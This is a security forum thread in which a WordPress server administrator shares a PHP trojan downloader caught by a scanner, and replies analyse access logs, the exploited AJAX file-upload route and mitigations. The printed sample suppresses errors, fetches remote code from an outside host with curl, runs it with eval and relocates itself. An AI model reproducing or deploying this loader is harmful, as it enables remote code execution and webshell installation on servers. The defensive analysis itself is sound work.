Jump to content

Malicious file PHP/TrojanDownloader.Agent.CZ was detected


Recommended Posts

Posted (edited)

Real time scanner on my Ubuntu 22.04 server thats used just to host wordpress sites found and deleted this bad boy

 

image.thumb.png.67ad884d186934ec7dba0bee6a4291ca.png

 

Content of the file are as follows:

<?php

error_reporting(0);

$HomePath = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/Text/Diff/";
define('CUSTOM_FILE_PATH', $HomePath);


$file_path = __FILE__;

$file_name = basename($file_path);

$ch = curl_init('hxxp://ndot.us/za');curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval('?>'.$result); 
$customFilePath = CUSTOM_FILE_PATH . $file_name;

rename(__FILE__,$customFilePath);
?>

 

Ive checked all sites /wp-includes/Text/Diff directories and there are no new modified files/folders in any of them.

What would be my next steps?

Thanks in advance

 

 

 

 

Edited by FTL
Posted

Chromium based browsers just show the code on the page in plain text

Firefox shows the page formatted

I cant see anything happening when i hit the page

I have blocked outbound access to ndot.us now but just wondering if and what anything has already happened?

Posted (edited)
2 hours ago, FTL said:

Firefox shows the page formatted

My FF 118.0.2 showed code in plain text format. Note the modification author even stated who he is. Since this person has multiple scripts posted at Github, I assume this is where it originated from.

PHP_1.thumb.png.a1f500cdcb5884c2c53eac3a934e7b32.png

PHP_2.thumb.png.6ff3dd3f3fc762110ed467b33a608390.png

PHP_3.thumb.png.2d185c9e21920056b8e236aa62f1ce7f.png

Edited by itman
Posted

Eset now finally blocking the domain;

Eset_Blocked.thumb.png.eaa76efd1394dbc8dc65f52be16831f6.png

Also of interest is this domain won't scan at Sucuri. It displays the web site doesn't contain any data - go figure.

Posted

Yes you did :) I also found it.

URLSCAN.IO shows multiple scans for this domain with different Webshells hosted on it.

@FTL

We also got this detection, but it`s OK because at least for us, webserver returned 404 or 500 when POST request was made (we do not host wordpress at all). So basically this is automated script, that tries to exploit some wordpress vulnerability and if successful, curl downloads webshell.

Example:
 

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And yes, detection occurred on: file:///tmp/phpMjc32fg  which is normal, because PHP processed this POST request.

So in my opinion nothing happened with your server, but check where that post request was made and make sure WP and plugins are up to date.

Posted
8 hours ago, Gregecslo said:

Yes you did :) I also found it.

The Github link I posted was to the original WP plug-in.

My above posted screen shots show that this plug-in was modified by someone named Mr. 7Mind. This same individual also has numerous other scripts posted at Github including reverse shell backdoors.

So it appears this hack was very much "an off-the-shelf" one. The question is where was the modified WP plug-in acquired from?

Posted

This I don`t know.

For me, detection came from this:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And it seems that exploited vuln is: https://support.alertlogic.com/hc/en-us/articles/115005740363-Metasploit-WordPress-Ajax-Load-More-Arbitrary-File-Upload

Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500....

That`s why I said that OP should check POST requests on server...

Posted

So 4 times had this file created and RTS deleted now

All on different sites - but they are all up to date for both Wordpress and all plugins

Server is up to date too

Same pesky IP aswell so thats blocked now but not the answer i know

Site 1

95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 2

95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 3

95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
Site 4

95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

 

How is this PITA managing to continually drop malicious PHP files onto the tmp folder on server?

In Depth scan of the server is clean

Posted

Hi Marcos

I use Nginx rather than Apache, both are on the latest stable versions i believe

nginx version: nginx/1.24.0

PHP 8.2.11 (cli) (built: Oct  6 2023 09:47:18) (NTS)

 

 

  • Administrators
Posted

I would then contact a security company that audits websites.

Posted (edited)
Quote

And yes, detection occurred on: file:///tmp/phpMjc32fg  which is normal, because PHP processed this POST request.

Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500....

If somebody does POST request with malicious file inside POST request PHP will process it (execution is done in PHP TMP folder) and that is where detection comes from.

This also happens to me on server where nothing is installed but apache + php...

Deleted ESET, SAME post request came, no files were dropped (but file was naturally in PHP).

Problem would be if you find XXXX.php file which was dropped in webserver folder...

Edited by Gregecslo
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...